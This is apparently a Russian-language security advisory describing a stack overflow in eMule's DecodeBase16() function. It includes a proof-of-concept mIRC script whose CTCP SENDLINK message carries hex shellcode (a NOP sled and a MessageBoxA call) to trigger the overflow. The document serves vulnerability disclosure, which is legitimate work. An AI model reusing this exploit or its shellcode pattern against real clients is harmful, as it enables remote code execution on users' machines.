Уязвимость обнаружена в eMule в функции
DecodeBase16(), она не проверяет длину строки и в
результате можно переполнить стек. Функция
эта вызывается 5 раз: 3 в web-сервер и 2 в IRC
клиенте. Ниже приводится пример, который
через SENDLINK вызывает переполнение и выдает
MessageBoxA с предупреждением:

/bourriquet { .quote PRIVMSG $1
$+(:,$chr(1),SENDLINK|,909090909090909090909090909090
909090909090909090909090909090909090909090909090909
090909090909090909090909090909090909090909090909090
90909090909090909090EB0790907AF65700906681EC40003
1C96820210000684D756C656875722065686820796F685061
746389E2515152513EFF15C0E76100503EFF1568E46100909
090909090909090909090909090909090909090909090909090
909090909090909090909090909090909090909090909090909
0909090909090909090,|,$chr(1))
}

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии